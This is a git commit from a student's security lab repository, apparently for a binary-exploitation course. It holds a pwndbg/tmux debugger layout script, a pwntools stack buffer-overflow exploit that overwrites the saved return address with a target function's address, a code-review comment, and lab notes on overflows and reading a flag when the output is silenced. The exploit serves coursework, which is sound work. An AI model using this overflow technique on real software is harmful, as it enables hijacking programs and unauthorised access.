lab 4a, got some nice pwndbg layout config

Kaushik Narayan R 2024-10-10 15:09:18 -07:00
parent a691485941
commit ef2aeb2e24
4 changed files with 110 additions and 0 deletions

41
.gdb_split.py Normal file

@ -0,0 +1,41 @@
import atexit
import os
from pwndbg.commands.context import contextoutput, output, clear_screen
bt = (
os.popen('tmux split-window -P -F "#{pane_id}:#{pane_tty}" -d "cat -"')
.read()
.strip()
.split(":")
)
st = (
os.popen(
f"tmux split-window -h -t {bt[0]} -P -F "
+ '"#{pane_id}:#{pane_tty}" -d "cat -"'
)
.read()
.strip()
.split(":")
)
re = (
os.popen(
f"tmux split-window -h -t {st[0]} -P -F "
+ '"#{pane_id}:#{pane_tty}" -d "cat -"'
)
.read()
.strip()
.split(":")
)
di = (
os.popen('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -d "cat -"')
.read()
.strip()
.split(":")
)
panes = dict(backtrace=bt, stack=st, regs=re, disasm=di)
for sec, p in panes.items():
contextoutput(sec, p[1], True)
contextoutput("legend", di[1], True)
atexit.register(
lambda: [os.popen(f"tmux kill-pane -t {p[0]}").read() for p in panes.values()]
)

5
.gdbinit Normal file

@ -0,0 +1,5 @@
source /opt/pwndbg/gdbinit.py
set context-stack-lines 20
set context-sections disasm stack regs backtrace
source ~/.gdb_split.py

46
4a/lab4a.py Normal file

@ -0,0 +1,46 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template
from pwn import *
# Set up pwntools for the correct architecture
# context.update(arch='i386')
exe = '/challenge/run'
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
io = start()
unbound_buffer = 0x7ffd6f3ab780
saved_rip = 0x7ffd6f3ab7c8
offset = saved_rip-unbound_buffer
target_fn = 0x401166
payload = b'F' * (offset - len('records/')) + p64(target_fn) + b'\n'
io.send(payload)
io.interactive()
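Review bot: `start` takes a mutable default `argv=[]` at the `def start` line; `[exe] + argv` does not mutate it today, but the idiom is `def start(argv=None, *a, **kw):` with `argv = [] if argv is None else argv` as the first statement, so a later edit cannot accidentally share state across calls. Separately, `unbound_buffer` and `saved_rip` are absolute stack addresses copied from a single debugger run and only their difference `offset` is used afterwards; a one-line comment saying so (or keeping just the computed `offset`) would stop a reader from assuming the absolute values are meaningful outside that run. The `.format(**locals())` on `gdbscript` is a no-op here because the string has no placeholders, which is harmless template residue.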


@ -356,3 +356,21 @@ done
### .15 - blind leading the blind ### .15 - blind leading the blind
- basically, stdout and stderr for the child are set to `/dev/null` so instead of spawning root shell, use `cat flag > output` and read output - basically, stdout and stderr for the child are set to `/dev/null` so instead of spawning root shell, use `cat flag > output` and read output
### .16 - arg wars VI - return of the hacker
- decompiler showed set of filtered characters, quotes and backslashes are not there
- also .17 checks for backslashes, so i assume backslashes solves this
- but i got stuck, TA said try the 'prequels' first then come back lol
### lab 4a.1 - easy overflow
- standard buffer overflow vuln
- gdb shenanigans
- shift-ctrl-@ inserts a null character it seems (remember for .16)
- enough gdb, let's move to big guns - pwntools
- checksec says no stack canary or PIE
- all g then
- calculate offset from vulnerable variable location to saved RIP(return instruction pointer) location
- get address of target function to execute
- craft payload accordingly